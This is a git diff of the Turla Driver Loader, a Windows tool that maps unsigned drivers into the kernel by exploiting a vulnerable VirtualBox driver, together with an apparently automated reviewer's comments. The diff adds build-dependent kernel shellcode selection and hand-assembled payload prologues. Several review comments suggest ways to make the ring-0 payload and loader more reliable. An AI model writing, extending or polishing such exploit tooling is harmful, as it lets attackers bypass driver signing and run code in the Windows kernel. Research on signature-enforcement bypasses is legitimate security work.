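Review bot: The added `DbgPrint("KeGetCurrentIrql=%ws\n", sIrql);` near the end of the hunk relies on the `%ws` specifier, which DbgPrint supports only at PASSIVE_LEVEL, while the value being printed exists precisely because this entry point may run at a higher IRQL. Declaring `PCSTR sIrql;`, assigning narrow literals such as `sIrql = "PASSIVE_LEVEL";`, and printing with `DbgPrint("KeGetCurrentIrql=%s\n", sIrql);` keeps the call valid at every IRQL DbgPrint accepts. PrintIrql in Source/DummyDrv2/dummy/main.c, added by the same commit, has the identical `%ws` usage and should get the same treatment.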
--- a/Source/DummyDrv2/dummy.sln +++ b/Source/DummyDrv2/dummy.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 14 -VisualStudioVersion = 14.0.24720.0 +VisualStudioVersion = 14.0.25420.1 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dummy", "dummy\dummy.vcxproj", "{3D8146DE-8064-46C0-9E70-CEEC357B2290}" EndProject diff --git a/Source/DummyDrv2/dummy/dummy.vcxproj b/Source/DummyDrv2/dummy/dummy.vcxproj index 8fa877b..fd7810d 100644 --- a/Source/DummyDrv2/dummy/dummy.vcxproj +++ b/Source/DummyDrv2/dummy/dummy.vcxproj @@ -1,14 +1,6 @@  - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -17,22 +9,6 @@ Release x64 - - Debug - ARM - - - Release - ARM - - - Debug - ARM64 - - - Release - ARM64 - {3D8146DE-8064-46C0-9E70-CEEC357B2290} @@ -45,22 +21,6 @@ 8.1 - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - Windowsv6.3 true @@ -78,38 +38,6 @@ Universal true - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - true - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - - - Windowsv6.3 - false - WindowsKernelModeDriver10.0 - Driver - KMDF - Universal - @@ -118,18 +46,6 @@ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - DbgengKernelDebugger AllRules.ruleset 
@@ -143,30 +59,6 @@ .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - - - DbgengKernelDebugger - AllRules.ruleset - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - false @@ -192,36 +84,6 @@ false - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - - - - false - - false diff --git a/Source/DummyDrv2/dummy/main.c b/Source/DummyDrv2/dummy/main.c index 7b434d3..b933d1c 100644 --- a/Source/DummyDrv2/dummy/main.c +++ b/Source/DummyDrv2/dummy/main.c @@ -1,12 +1,14 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 +* +* "Driverless" example #2 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -19,6 +21,51 @@ #define DEBUGPRINT +/* +* PrintIrql +* +* Purpose: +* +* Debug print current irql. +* +*/ +VOID PrintIrql() +{ + KIRQL Irql; + PWSTR sIrql; + + Irql = KeGetCurrentIrql(); + + switch (Irql) { + + case PASSIVE_LEVEL: + sIrql = L"PASSIVE_LEVEL"; + break; + case APC_LEVEL: + sIrql = L"APC_LEVEL"; + break; + case DISPATCH_LEVEL: + sIrql = L"DISPATCH_LEVEL"; + break; + case CMCI_LEVEL: + sIrql = L"CMCI_LEVEL"; + break; + case CLOCK_LEVEL: + sIrql = L"CLOCK_LEVEL"; + break; + case IPI_LEVEL: + sIrql = L"IPI_LEVEL"; + break; + case HIGH_LEVEL: + sIrql = L"HIGH_LEVEL"; + break; + default: + sIrql = L"Unknown Value"; + break; + } + DbgPrint("KeGetCurrentIrql=%u(%ws)\n", Irql, sIrql); +} + /* * DevioctlDispatch * @@ -168,26 +215,6 @@ NTSTATUS CloseDispatch( return Irp->IoStatus.Status; } -VOID ListModules( - _In_ struct _DRIVER_OBJECT *DriverObject - ) -{ - PLIST_ENTRY entry0, entry1; - KLDR_DATA_TABLE_ENTRY *section = (KLDR_DATA_TABLE_ENTRY*)DriverObject->DriverSection; - - if (section == NULL) - return; - - entry0 = section->InLoadOrderLinks.Flink; - entry1 = entry0; - - do { - section = (KLDR_DATA_TABLE_ENTRY*)CONTAINING_RECORD(entry1, KLDR_DATA_TABLE_ENTRY, InLoadOrderLinks); - DbgPrint("Section=%p, %wZ", section, section->BaseDllName); - entry1 = entry1->Flink; - } while (entry1 != entry0); -} - /* * DriverInitialize * 
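Review bot: `VOID PrintIrql()` at the top of the hunk is an unprototyped declaration in C, so a call with stray arguments would compile without complaint; `VOID PrintIrql(VOID)` declares the empty parameter list explicitly and matches the fully annotated signatures used elsewhere in this file. If main.h also declares the function, its prototype should use the same form.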
@@ -202,37 +229,33 @@ NTSTATUS DriverInitialize( ) { NTSTATUS status; - UNICODE_STRING SymLink, DevName/*, DrvRefName*/; + UNICODE_STRING SymLink, DevName; PDEVICE_OBJECT devobj; ULONG t; - WCHAR szDevName[] = { L'\\', L'D', L'e', L'v', L'i', L'c', L'e', L'\\', L'T', L'D', L'L', L'D', 0 }; - WCHAR szSymLink[] = { L'\\', L'D', L'o', L's', L'D', L'e', L'v', L'i', L'c', L'e', L's', L'\\', L'T', L'D', L'L', L'D', 0 }; -// WCHAR szNullDrv[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'N', L'u', L'l', L'l', 0 }; -// PDRIVER_OBJECT driverObject; //RegistryPath is NULL - UNREFERENCED_PARAMETER(RegistryPath); + UNREFERENCED_PARAMETER(RegistryPath); #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&DevName, szDevName); + RtlInitUnicodeString(&DevName, L"\\Device\\TDLD"); status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, TRUE, &devobj); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDevice(%wZ) = %lx", __FUNCTION__, DevName, status); + DbgPrint("%s IoCreateDevice(%wZ) = %lx\n", __FUNCTION__, DevName, status); #endif if (!NT_SUCCESS(status)) { return status; } - RtlInitUnicodeString(&SymLink, szSymLink); + RtlInitUnicodeString(&SymLink, L"\\DosDevices\\TDLD"); status = IoCreateSymbolicLink(&SymLink, &DevName); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx", __FUNCTION__, SymLink, status); + DbgPrint("%s IoCreateSymbolicLink(%wZ) = %lx\n", __FUNCTION__, SymLink, status); #endif devobj->Flags |= DO_BUFFERED_IO; 
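Review bot: After `status = IoCreateSymbolicLink(&SymLink, &DevName);` in the middle of the hunk the status is not checked, so a failed link creation still falls through to configuring `devobj`, and later in the function the failing status is returned while the device object created a few lines earlier is left in place. Mirroring the check already done for IoCreateDevice, `if (!NT_SUCCESS(status)) { IoDeleteDevice(devobj); return status; }`, releases the device on that failure path. DriverInitialize continues past the end of the hunk, where the final `return status` lives.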
@@ -246,17 +269,6 @@ NTSTATUS DriverInitialize( DriverObject->DriverUnload = NULL; //nonstandard way of driver loading, no unload devobj->Flags &= ~DO_DEVICE_INITIALIZING; -/* - RtlInitUnicodeString(&DrvRefName, szNullDrv); - if (NT_SUCCESS(ObReferenceObjectByName(&DrvRefName, OBJ_CASE_INSENSITIVE, NULL, 0, - *IoDriverObjectType, KernelMode, NULL, &driverObject))) - { - DbgPrint("drvObj %p", driverObject); - ListModules(driverObject); - ObDereferenceObject(driverObject); - } - */ - return status; } @@ -274,22 +286,23 @@ NTSTATUS DriverEntry( ) { NTSTATUS status; - UNICODE_STRING drvName; - WCHAR szDrvName[] = { L'\\', L'D', L'r', L'i', L'v', L'e', L'r', L'\\', L'T', L'D', L'L', L'D', 0 }; - + UNICODE_STRING drvName; + /* This parameters are invalid due to nonstandard way of loading and should not be used. */ UNREFERENCED_PARAMETER(DriverObject); UNREFERENCED_PARAMETER(RegistryPath); + PrintIrql(); + #ifdef DEBUGPRINT - DbgPrint("%s", __FUNCTION__); + DbgPrint("%s\n", __FUNCTION__); #endif - RtlInitUnicodeString(&drvName, szDrvName); + RtlInitUnicodeString(&drvName, L"\\Driver\\TDLD"); status = IoCreateDriver(&drvName, &DriverInitialize); #ifdef DEBUGPRINT - DbgPrint("%s IoCreateDriver(%wZ) = %lx", __FUNCTION__, drvName, status); + DbgPrint("%s IoCreateDriver(%wZ) = %lx\n", __FUNCTION__, drvName, status); #endif return status; diff --git a/Source/DummyDrv2/dummy/main.h b/Source/DummyDrv2/dummy/main.h index e69a424..4e203fd 100644 --- a/Source/DummyDrv2/dummy/main.h +++ b/Source/DummyDrv2/dummy/main.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.H * -* VERSION: 1.00 +* VERSION: 1.01 * -* DATE: 29 Jan 2016 +* DATE: 20 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
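Review bot: The new `PrintIrql();` call in DriverEntry is unconditional, whereas every DbgPrint in the function, including the one immediately below it, is wrapped in `#ifdef DEBUGPRINT`; enclosing the call the same way keeps the non-debug build free of this output and lets the single switch actually control all diagnostic printing. The function's header comment begins above the hunk.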
@@ -24,21 +24,6 @@ IoCreateDriver( IN PDRIVER_INITIALIZE InitializationFunction ); -NTKERNELAPI -NTSTATUS -ObReferenceObjectByName( - __in PUNICODE_STRING ObjectName, - __in ULONG Attributes, - __in_opt PACCESS_STATE AccessState, - __in_opt ACCESS_MASK DesiredAccess, - __in POBJECT_TYPE ObjectType, - __in KPROCESSOR_MODE AccessMode, - __inout_opt PVOID ParseContext, - __out PVOID *Object - ); - -extern POBJECT_TYPE *IoDriverObjectType; - _Dispatch_type_(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH DevioctlDispatch; _Dispatch_type_(IRP_MJ_CREATE) @@ -88,25 +73,3 @@ typedef struct _INOUT_PARAM { ULONG Param3; ULONG Param4; } INOUT_PARAM, *PINOUTPARAM; - -typedef struct _KLDR_DATA_TABLE_ENTRY { - LIST_ENTRY InLoadOrderLinks; - PVOID ExceptionTable; - ULONG ExceptionTableSize; - // ULONG padding on IA64 - PVOID GpValue; - PVOID NonPagedDebugInfo; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STRING FullDllName; - UNICODE_STRING BaseDllName; - ULONG Flags; - USHORT LoadCount; - USHORT __Unused5; - PVOID SectionPointer; - ULONG CheckSum; - // ULONG padding on IA64 - PVOID LoadedImports; - PVOID PatchInformation; -} KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY; diff --git a/Source/Furutaka/Furutaka.vcxproj b/Source/Furutaka/Furutaka.vcxproj index ce94cc4..ddc2985 100644 --- a/Source/Furutaka/Furutaka.vcxproj +++ b/Source/Furutaka/Furutaka.vcxproj @@ -53,7 +53,7 @@ false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - NativeRecommendedRules.ruleset + AllRules.ruleset false @@ -78,23 +78,23 @@ Level4 - MaxSpeed + Full true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true CompileAsC true true false - Guard - MultiThreaded + MultiThreadedDLL + Neither + true Console true true - true + false TDLMain true RequireAdministrator diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index b15eb0d..b886899 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h 
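Review bot: The removed `Guard` value in the Release compiler settings looks like the ControlFlowGuard option being dropped (the element names are stripped on this page, so this is inferred from the value alone), which would build the loader without CFG; if that is a side effect of the `Full` optimization change rather than the intent, the line should come back, and if it is intentional the commit message should say why. The change from `MultiThreaded` to `MultiThreadedDLL` likewise moves the CRT from static to dynamic linkage, which adds a runtime dependency on the VC++ redistributable and also deserves a sentence in the description.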
@@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index c0b7c24..c6b259e 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -4,9 +4,9 @@ * * TITLE: MAIN.C * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Furutaka entry point. * @@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; WCHAR g_BE = 0xFEFF; +ULONG g_NtBuildNumber = 0; + #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" #define supImageHandle 0x1a000 #define PAGE_SIZE 0x1000 -#define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR NewImageBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -139,9 +140,9 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName + _In_ ULONG_PTR KernelBase, + _In_ ULONG_PTR KernelImage, + _In_ LPCSTR FunctionName ) { ANSI_STRING cStr; 
@@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase + _In_ ULONG_PTR Image, + _In_ ULONG_PTR KernelImage, + _In_ ULONG_PTR KernelBase ) { PIMAGE_OPTIONAL_HEADER popth; @@ -211,8 +212,9 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize + _In_ LPVOID Shellcode, + _In_ ULONG CodeSize, + _In_ ULONG DataOffset ) { SUPCOOKIE Cookie; @@ -307,7 +309,7 @@ void TDLExploit( ultohex(CodeSize, _strend(text)); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } @@ -376,13 +378,14 @@ void TDLExploit( * */ UINT TDLMapDriver( - LPWSTR lpDriverFullName + _In_ LPWSTR lpDriverFullName ) { UINT result = (UINT)-1; - ULONG isz; + ULONG isz, prologueSize, dataOffset; SIZE_T memIO; - ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0; + ULONG_PTR KernelBase, KernelImage = 0; + ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0; HMODULE Image = NULL; PIMAGE_NT_HEADERS FileHeader; PBYTE Buffer = NULL; 
@@ -443,16 +446,30 @@ UINT TDLMapDriver( cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); } - RtlInitString(&routineName, "PsCreateSystemThread"); - status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); - if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { - cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); - u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + if (g_NtBuildNumber < 15063) { + RtlInitString(&routineName, "PsCreateSystemThread"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); + if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); + u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } + + RtlInitString(&routineName, "ZwClose"); + status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose); + if ((!NT_SUCCESS(status)) || (xZwClose == 0)) { + cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: ZwClose 0x")); + u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } } memIO = isz + PAGE_SIZE; 
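Review bot: The ZwClose lookup added at the end of the hunk is the third copy of the resolve-then-print-or-break sequence (ExAllocatePoolWithTag above the hunk, then PsCreateSystemThread, now ZwClose), each differing only in the routine name and the two messages. A static helper with a signature like `static BOOL TDLResolveKernelRoutine(ULONG_PTR KernelImage, ULONG_PTR KernelBase, LPCSTR Name, PULONG_PTR Address)` that performs the LdrGetProcedureAddress call and the printing, returning FALSE on failure, would reduce each lookup to one call plus `if (!...) break;` and keep the log format identical across the three. The `do { } while` block that these `break` statements leave begins above the hunk.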
@@ -470,25 +487,49 @@ UINT TDLMapDriver( // mov rcx, ExAllocatePoolWithTag // mov rdx, PsCreateSystemThread + // mov r8, ZwClose Buffer[0x00] = 0x48; // mov rcx, xxxxx Buffer[0x01] = 0xb9; *((PULONG_PTR)&Buffer[2]) = KernelBase + (xExAllocatePoolWithTag - KernelImage); - Buffer[0x0a] = 0x48; // mov rdx, xxxxx - Buffer[0x0b] = 0xba; - *((PULONG_PTR)&Buffer[0x0c]) = - KernelBase + (xPsCreateSystemThread - KernelImage); - RtlCopyMemory(Buffer + 0x14, - TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); - RtlCopyMemory(Buffer + scDataOffset, Image, isz); + if (g_NtBuildNumber < 15063) { + Buffer[0x0a] = 0x48; // mov rdx, xxxxx + Buffer[0x0b] = 0xba; + *((PULONG_PTR)&Buffer[0x0c]) = + KernelBase + (xPsCreateSystemThread - KernelImage); + Buffer[0x14] = 0x49; //mov r8, xxxxx + Buffer[0x15] = 0xb8; + *((PULONG_PTR)&Buffer[0x16]) = + KernelBase + (xZwClose - KernelImage); + + prologueSize = 0x1e; + } + else { + prologueSize = 0x0a; + } + + dataOffset = prologueSize + MAX_SHELLCODE_LENGTH; + + if (g_NtBuildNumber < 15063) { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); + cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + else { + RtlCopyMemory(Buffer + prologueSize, + TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2)); + cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE); + } + + RtlCopyMemory(Buffer + dataOffset, Image, isz); cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); - TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase); + TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase); cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); - TDLExploit(Buffer, isz + PAGE_SIZE); + TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset); result = 0; break; } 
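Review bot: `prologueSize = 0x1e` and the `0x0a`/`0x14`/`0x16` slots are hand-counted from the three 10-byte `movabs` emitted above them, and nothing checks that `sizeof(TDLBootstrapLoader_code)` (480) or `sizeof(TDLBootstrapLoader_code_w10rs2)` (321) still fits in the `MAX_SHELLCODE_LENGTH` window that `dataOffset` assumes, so a future loader that grows past 0x300 bytes would have its tail silently overwritten by `RtlCopyMemory(Buffer + dataOffset, Image, isz)`. I would express the prologue as a count of immediates, `#define TDL_MOVABS_SIZE 10` with `prologueSize = 3 * TDL_MOVABS_SIZE;` / `1 * TDL_MOVABS_SIZE`, and add `C_ASSERT(sizeof(TDLBootstrapLoader_code) <= MAX_SHELLCODE_LENGTH); C_ASSERT(sizeof(TDLBootstrapLoader_code_w10rs2) <= MAX_SHELLCODE_LENGTH);` next to the arrays. The image copy also relies on `dataOffset` staying below the single extra `PAGE_SIZE` that `memIO = isz + PAGE_SIZE` reserves; that assumption deserves a comment or `C_ASSERT(0x1e + MAX_SHELLCODE_LENGTH <= PAGE_SIZE)`. The `// mov rdx, PsCreateSystemThread` / `// mov r8, ZwClose` comment above the buffer now describes only the pre-15063 layout and should say so. TDLMapDriver begins and ends outside the hunk.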
@@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver( } } - //if vbox installed backup it driver, do it before dropping our + // + // If vbox installed backup it driver, do it before dropping our + // Ignore error if file not found + // if (g_VBoxInstalled) { if (supBackupVBoxDrv(FALSE) == FALSE) { cuiPrintText(g_ConOut, TEXT("Ldr: Error while doing VirtualBox driver backup"), g_ConsoleOutput, TRUE); - - break; } } @@ -717,7 +759,7 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine + _In_ LPWSTR lpCommandLine ) { UINT retVal = (UINT)-1; @@ -765,7 +807,7 @@ void TDLMain() UINT uResult = 0; DWORD dwTemp; LONG x; - OSVERSIONINFOW osv; + OSVERSIONINFO osv; WCHAR text[256]; __security_init_cookie(); @@ -795,7 +837,6 @@ void TDLMain() T_LOADERINTRO, g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1) { cuiPrintText(g_ConOut, @@ -817,6 +858,8 @@ void TDLMain() break; } + g_NtBuildNumber = osv.dwBuildNumber; + _strcpy(text, TEXT("Ldr: Windows v")); ultostr(osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); @@ -825,6 +868,10 @@ void TDLMain() ultostr(osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + // + // If VirtualBox installed on the same machine warn user, + // however this is unnecessary can lead to any conflicts. + // g_VBoxInstalled = TDLVBoxInstalled(); if (g_VBoxInstalled) { cuiPrintText(g_ConOut, diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index 351f442c7176a2a4729c40bed9b8f6bc4cff6863..9b6d71fe72095ebbdcf596f94c50ba42be17f8d5 100644 GIT binary patch delta 42 vcmX@6b4+K04mYFWWL<7^M#Igi+#i{MR5+hEkeVFMr#ShVfY9b^0tKu96jKbt delta 42 vcmX@6b4+K04mYF0WL<7^MuW|%+#i{MR5+hEkeVFMr#ShVfY9b^0tKu96Y>nd diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index 469aa42..8bf5be4 100644 --- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h 
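Review bot: Dropping the `break` in the `@@ -575,14 +616,15 @@` hunk makes every failure of supBackupVBoxDrv non-fatal, while the new comment says only a missing file should be ignored; supBackupVBoxDrv is outside this view, so if it also returns FALSE for access-denied or a full disk, the loader now proceeds past a failed backup and, per the comment, drops its own driver over the user's VirtualBox driver with nothing to restore from afterwards. I would keep the error fatal and special-case only the expected condition, e.g. `if (supBackupVBoxDrv(FALSE) == FALSE && GetLastError() != ERROR_FILE_NOT_FOUND) { cuiPrintText(g_ConOut, TEXT("Ldr: Error while doing VirtualBox driver backup"), g_ConsoleOutput, TRUE); break; }`, assuming supBackupVBoxDrv leaves the Win32 last error intact (confirm), or have it return TRUE when there is no file to back up. TDLStartVulnerableDriver begins outside the hunk.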
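Review bot: `g_NtBuildNumber = osv.dwBuildNumber;` in the `@@ -817,6 +858,8 @@` hunk now selects which kernel-mode loader is written into the ring-0 payload, but the call that fills `osv` sits above the hunk and is not visible; if it is GetVersionEx without a supportedOS manifest, dwBuildNumber is capped at 9200 on newer systems and a Windows 10 RS2 machine would get the pre-15063 prologue and shellcode, which presumably fails inside the kernel rather than in the loader. Please confirm the value comes from RtlGetVersion (or an equivalent uncapped source) and record that at the assignment, e.g. `g_NtBuildNumber = osv.dwBuildNumber; // from RtlGetVersion; drives shellcode selection in TDLMapDriver`. TDLMain continues outside the hunk.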
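Review bot: The new comment in the `@@ -825,6 +868,10 @@` hunk, `however this is unnecessary can lead to any conflicts`, is garbled and does not say which conflict is meant. From the backup logic earlier in this file the concern appears to be that an installed VirtualBox owns a copy of the same driver this tool drops; I would write it as `// Warn if VirtualBox is installed: it is not required by the loader, but its own copy of the driver can conflict with the one we drop.` TDLMain continues outside the hunk.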
@@ -4,9 +4,9 @@ * * TITLE: SHELLCODE.H * -* VERSION: 1.10 +* VERSION: 1.11 * -* DATE: 17 Apr 2017 +* DATE: 20 Apr 2017 * * Loader bootstrap shellcode. * @@ -22,8 +22,7 @@ typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( _In_ POOL_TYPE PoolType, _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ ULONG Tag); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _Out_ PHANDLE ThreadHandle, @@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( _In_opt_ HANDLE ProcessHandle, _Out_opt_ PCLIENT_ID ClientId, _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _In_opt_ PVOID StartContext); + +typedef NTSTATUS (NTAPI *PfnZwClose)( + _In_ HANDLE Handle); + +typedef NTSTATUS(NTAPI *PfnDriverEntry)(); + +#define MAX_SHELLCODE_LENGTH 0x300 /* * TDLBootstrapLoader @@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( /* void TDLBootstrapLoader( PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnPsCreateSystemThread PsCreateSystemThread, + PfnZwClose ZwClose) { ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH; PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; PIMAGE_FILE_HEADER fileh = 
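Review bot: `typedef NTSTATUS(NTAPI *PfnDriverEntry)();` in the `@@ -32,8 +31,14 @@` hunk is an unprototyped pointer, and the RS2 reference loader further down calls it as `DriverEntry()` with no arguments, so the mapped driver's DriverEntry receives whatever rcx/rdx happen to hold at the jump rather than a defined DriverObject/RegistryPath. I would declare it as `typedef NTSTATUS(NTAPI *PfnDriverEntry)(_In_opt_ PDRIVER_OBJECT DriverObject, _In_opt_ PUNICODE_STRING RegistryPath);`, call it with explicit `(NULL, NULL)`, and regenerate the byte array, so the dummy driver can rely on a NULL DriverObject. `MAX_SHELLCODE_LENGTH` also deserves a comment, since the value appears to be baked into the compiled stubs as the `add rbx, 300h` immediate: `// Bytes reserved for the loader stub before the mapped driver image; compiled into the shellcode arrays below, so regenerate them if this changes.`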
